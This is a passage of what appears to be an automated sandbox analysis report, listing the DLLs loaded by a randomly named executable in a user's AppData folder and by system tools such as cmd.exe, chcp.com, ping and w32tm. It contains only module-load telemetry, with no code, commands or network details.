                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ktmw32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ktmw32.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wbemcomn.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: amsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasapi32.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasman.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rtutils.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: winhttp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasadhlp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dlnashext.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wpdshext.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: slc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ktmw32.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wbemcomn.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: amsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasapi32.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasman.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rtutils.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: winhttp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasadhlp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dlnashext.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wpdshext.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: slc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mscoree.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ktmw32.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wbemcomn.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: amsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: iphlpapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dnsapi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: winnsi.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasapi32.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasman.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rtutils.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: winhttp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: rasadhlp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: dlnashext.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wpdshext.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: slc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
